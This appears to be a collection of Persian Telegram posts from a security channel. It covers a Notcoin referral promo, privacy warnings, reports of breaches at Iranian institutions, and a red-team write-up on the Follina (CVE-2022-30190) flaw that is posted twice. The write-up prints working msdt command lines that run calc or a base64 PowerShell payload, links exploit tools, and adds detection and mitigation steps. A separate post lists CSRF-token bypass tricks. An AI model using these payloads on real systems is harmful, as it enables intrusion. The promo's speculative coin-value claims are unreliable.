از نگاه احسان

💵 بعد از اینکه وارد لیگ نقره ای بشید، میتونید Auto Bot رو فعال کنید و فقط هر 12 ساعت یه بار برید مقدار ماین شده رو جمع کنید.

نات کوین ها حداکثر تا 1 آپریل ماین میشن. احتمالا بعد از 1 آپریل یه برنامه جدیدی خواهند داشت و بازی رو شاید اصلا عوض کنن و از این حالت click to earn ای در بیاد و فقط برای ماینینگ Click to Earn زده باشن. هر مقدار نات کوین داشته باشید بعدا با یه مقدار خیلی کمی TON میتونید مینت کنید رو بلاکچین تون. همینطور تیم نات کوین گفته که ارزشون برخلاف میم کوین های دیگه صفر زیاد نخواهد داشت. همش وابسته به 1 آپریله. با لینک پین شده برید بونوس اولیه میگیرید.

حداقل قیمت فعلی ۱۰ میلیون نات کوین ۵.۹ TON معادل تقریبا ۳۰ دلار با ۲ میلیون تومان ایران هست. برای اینکه مینت کنید و بتونید تو presale بفروشید باید ۱۰ میلیون جمع کنید

پریمیوم داشته باشید ورودی ۵۰ کی میده، برای ممبر عادی ۲.۵ کی. 🥸

برید نات کوین بگیرید تا رستگار شوید. ۱۰ میلیون تا ووچر رو میتونید بگیرید ۱ اپریل مینت میشه

https://t.me/notcoin_bot?start=r_576935_10016678 🎁 +2.5k Notcoin as a first-time gift 🎁🎁🎁 +50k Notcoin if you have Telegram Premium @PremiumBot

⭕️ #هشدار در کانال ها و گروه های زیادی این پیشنهاد رو به کاربران میدن که برای متصل شدن و دور زدن فیلترینگ، تنظیمات اینترنت خودشون رو در حالت 2G بزارن. اگر روی این حالت ببرید تمام ارتباطات شما بدون هیچگونه رمزنگاری تبادل میشود. یعنی با داشتن شماره موبایل شما ، نهادهای جاسوسی میتونند موبایل شما رو هک کنند. #هشدار @securation

⭕️ شنود پیامک های شما و سیستم جدید فیلترینگ که باعث میشه پیام ها به دست همدیگه نرسه یک مرض ثابت و رایج شده. اینجا نرم افزار نهفت خیلی به کار میاد و حتما همگی از این نرم افزار استفاده کنید:) ++«نهفت» نرم‌افزار آفلاین برای رمزنگاری پیام‌های متنی در گوشی‌های اندرویدی است. با نهفت پیام‌های خود را در قالب یک عکس یا رشته‌ای از کلمات معنادار فارسی رمزنگاری کرده و آن را از طریق هر پیام رسانی، برای شخص مورد نظر خود ارسال کنید. نهفت یک پیام‌رسان نیست، بلکه ابزاری برای رمزنگاری پیام‌هاست. دانلود از گوگل پلی لطفا برای همگی دوستان و آشنایان خود ارسال کنید. #فیلترینگ #شنود #سانسور @securation

با سلام و وقت بخیر وبینار Red Team P1 پنجشنبه 3 شهریور ساعت 13 برگزار خواهد شد. سرفصل های که قرار صحبت بشه و همچنین لینک ورود به وبینار : https://webinar.sindadsec.ir/redteaming

⭕️ پتروشیمی لرستان و شرکت پتروشیمی فجر هک شده و دیتاهای اونها برای فروش قرار گرفته است. تصویر ضمیمه شده یکی از عکسهایی هست که شخص هکر برای POC ارائه قرار داده است. تاکنون هیچ واکنشی از مراجع قانونی یا پتروشیمی های مربوطه ارائه داده نشده است. #پتروشیمی_فجر #لرستان @securation

⭕️ بنظر میاد دانشگاه شریف و دانشگاه تهران توسط گروهی با پرچم #اسرائیل هک شده اند. تصاویری از دسترسی root سرورهای دانشگاه شریف و دانشگاه تهران بهمراه تصاویر دیگری از ایمیل سرورهای آنها نشان میدهد هکرها به تمامی سرویس های این دو دانشگاه نفوذ کامل داشته اند. @securation

⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات Client access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و... حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد. حالا نکته ای که هست با اجرای این خط کامند: msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\" ماشین حساب اجرا میشه و با اجرای : msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\" اگر جای base64_payload پیلود ما باشه اجرا میشه . برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :‌ https://github.com/Hrishikesh7665/Follina_Exploiter_CLI https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina https://github.com/JohnHammond/msdt-follina از این ابزار ها میتوان به راحتی استفاده کرد. https://github.com/rayorole/CVE-2022-30190 این هم فایل HTML مورد نظر هستش بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟ اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست. در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم. نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟ اگر به صورت کامندی صورت گرفته باشه باید در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه به هر طریقی که ما اجرا کنیم یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه ) در مسیر appdata/local/diagnostics هستش. #redteam #follina #exploit #analysis @securation

⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات clinet access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و... حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و EXEL و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد. حالا نکته ای که هست با اجرای این خط کامند: msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\" ماشین حساب اجرا میشه و با اجرای : msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\" اگر جای base64_payload پیلود ما باشه اجرا میشه . برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :‌ https://github.com/Hrishikesh7665/Follina_Exploiter_CLI https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina https://github.com/JohnHammond/msdt-follina از این ابزار ها میتوان به راحتی استفاده کرد. https://github.com/rayorole/CVE-2022-30190 این هم فایل HTML مورد نظر هستش بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟ اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست. در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم. نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟ اگر به صورت کامندی صورت گرفته باشه باید در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه به هر طریقی که ما اجرا کنیم یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه ) در مسیر appdata/local/diagnostics هستش. #redteam #follina #exploit #analysis @securation

⭕️ دور زدن CSRF Tokens 1- حذف کردن CSRF Token 2- تعویض متد درخواست از POST به GET 3- استفاده از CSRF Token کاربر دیگر 4- ترکیب کردن Session Fixation و استفاده از یک توکن جعل شده معتبر در مواقعی که مکانیزم به کار رفته Double submit cookie هست. https://systemweakness.com/introduction-to-csrf-stepwise-guide-to-bypass-csrf-tokens-2-2-1375b30d479e #web #cookie #CsrfToken @securation

⭕️ نسخه حدید systemd منتشر شد. تغییرات خیلی خوبی در زمینه امنیت داشته پشتیبانی از credentialهای رمزنگاری شده و authenticated . هماهنگی بیشتر با پارتیشن های رمز شده و پشتیبانی از TPM2/FIDO2/PKCS11 . استفاده از libgcrypt به جای OpenSSL . امکان محدود سازی Network Interface ها و محدود کردن FileSystems سرویس ها با BPF LSM توضیحات بیشتر رو اینجا بخونید : https://github.com/systemd/systemd/releases/tag/v250 #systemd #security #hardening @securation

کلیه دارایی های دیجیتال یک سازمان چه داخلی و چه خارجی که روی اینترنت هست Attack surface محسوب می شوند که هکر ها از طریق اکسپلویت آن ها نفوذ می کنند.شناسایی دارایی ارزیابی آن ها و همچنین مدیریت و نظارت مستمر بر روی آن ها بسیار امر حیاتی می باشد. https://blog.peneter.com/asm/ #ASM

حملات سایبری توسط شاخص ها (indicators) قابل شناسایی و دفاع هستند طبق هرم درد در صورت چشم پوشی از هر کدام از شاخص ها احتمال موفقیت حملات سایبری بالاتر خواهند رفت.در مورد مایتر و TTPs قبلا در بلاگ پست قرار گرفته است . https://blog.peneter.com/the-pyramid-of-pain/ #IOC #indicator #The_pyramid_of_pain